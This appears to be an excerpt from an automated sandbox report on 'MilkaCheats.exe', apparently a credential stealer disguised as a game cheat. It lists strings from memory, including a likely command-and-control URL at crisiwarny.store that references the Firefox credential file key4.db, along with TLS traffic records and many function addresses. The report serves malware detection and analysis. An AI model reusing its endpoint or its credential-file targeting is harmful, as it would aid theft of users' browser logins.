              Source: MilkaCheats.exe, 00000001.00000003.1802442318.000000000136C000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1794077852.000000000136C000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1835884206.000000000136C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/e
              Source: MilkaCheats.exe, 00000001.00000003.1767891806.000000000136C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/rjm
              Source: MilkaCheats.exe, 00000001.00000003.1802442318.000000000136C000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1835884206.000000000136C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/s:md
              Source: MilkaCheats.exe, MilkaCheats.exe, 00000001.00000003.1847808450.0000000001361000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1802215575.0000000001361000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1726270504.0000000001342000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1794321232.0000000001360000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1794077852.000000000135F000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1778356922.000000000135E000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1778286668.0000000001358000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1768149959.0000000001342000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000002.1848584862.0000000001361000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store:443/api
              Source: MilkaCheats.exe, 00000001.00000003.1767891806.000000000136C000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1778631917.000000000136C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store:443/api2o4p.default-release/key4.dbPK
              Source: MilkaCheats.exe, 00000001.00000003.1802442318.000000000136C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store:443/apiPackages
              Source: MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: MilkaCheats.exe, 00000001.00000003.1751292403.000000000136A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: MilkaCheats.exe, 00000001.00000003.1712448019.0000000003A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: MilkaCheats.exe, 00000001.00000003.1750884533.0000000003AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: MilkaCheats.exe, 00000001.00000003.1750884533.0000000003AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: MilkaCheats.exe, 00000001.00000003.1712448019.0000000003A2E000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712503562.0000000003A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: MilkaCheats.exe, 00000001.00000003.1712503562.0000000003A02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: MilkaCheats.exe, 00000001.00000003.1712448019.0000000003A2E000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712503562.0000000003A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: MilkaCheats.exe, 00000001.00000003.1712503562.0000000003A02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: MilkaCheats.exe, 00000001.00000003.1751292403.000000000136A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: MilkaCheats.exe, 00000001.00000003.1751292403.000000000136A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: MilkaCheats.exe, 00000001.00000003.1750884533.0000000003AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: MilkaCheats.exe, 00000001.00000003.1750884533.0000000003AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: MilkaCheats.exe, 00000001.00000003.1750884533.0000000003AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: MilkaCheats.exe, 00000001.00000003.1750884533.0000000003AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: MilkaCheats.exe, 00000001.00000003.1750884533.0000000003AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000F80260_2_000F8026
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000FA1600_2_000FA160
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_001222340_2_00122234
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_001022550_2_00102255
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_001102D50_2_001102D5
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_0011E2E90_2_0011E2E9
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_0013231D0_2_0013231D
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_001283710_2_00128371
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000FC3700_2_000FC370
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_001144320_2_00114432
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000D04700_2_000D0470
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_0011E5F30_2_0011E5F3
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000F86700_2_000F8670
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000CE8210_2_000CE821
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000D88230_2_000D8823
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_001228710_2_00122871
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_001168A40_2_001168A4
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_001308F00_2_001308F0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_001109300_2_00110930
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_001289330_2_00128933
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_001049E70_2_001049E7
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_00130B100_2_00130B10
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000CEB690_2_000CEB69
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_0011EC6A0_2_0011EC6A
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C4C860_2_000C4C86
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_0011ECB90_2_0011ECB9
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_0011ECA60_2_0011ECA6
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_00114D500_2_00114D50
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_00104DA70_2_00104DA7
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000D4E130_2_000D4E13
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_00102E5C0_2_00102E5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_00118F300_2_00118F30
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_00130F200_2_00130F20
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_00122FD70_2_00122FD7
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000FD0300_2_000FD030
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_0011D0F00_2_0011D0F0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C710C0_2_000C710C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000F51200_2_000F5120
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000DF1750_2_000DF175
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000F91C00_2_000F91C0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_001292A00_2_001292A0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_001313C00_2_001313C0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000EF4100_2_000EF410
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_0012D4300_2_0012D430
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_001334500_2_00133450
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000F34600_2_000F3460
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_001234600_2_00123460
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000F54C00_2_000F54C0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_001114F00_2_001114F0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000F34FA0_2_000F34FA
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_001295000_2_00129500
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_0010F5C80_2_0010F5C8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000F96500_2_000F9650
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000EF6E50_2_000EF6E5
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000EF7380_2_000EF738
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_001337400_2_00133740
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_0011982E0_2_0011982E
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_0011D9800_2_0011D980
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_0011DB4A0_2_0011DB4A
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_00111B800_2_00111B80
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_00129BC00_2_00129BC0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_0012DC100_2_0012DC10
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000F1D400_2_000F1D40
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_0011DDE00_2_0011DDE0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000FBE900_2_000FBE90
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000F5EC00_2_000F5EC0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_0010DFB00_2_0010DFB0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_0135812A1_3_0135812A
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_0135815E1_3_0135815E
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370CBE1_3_01370CBE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370BA81_3_01370BA8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
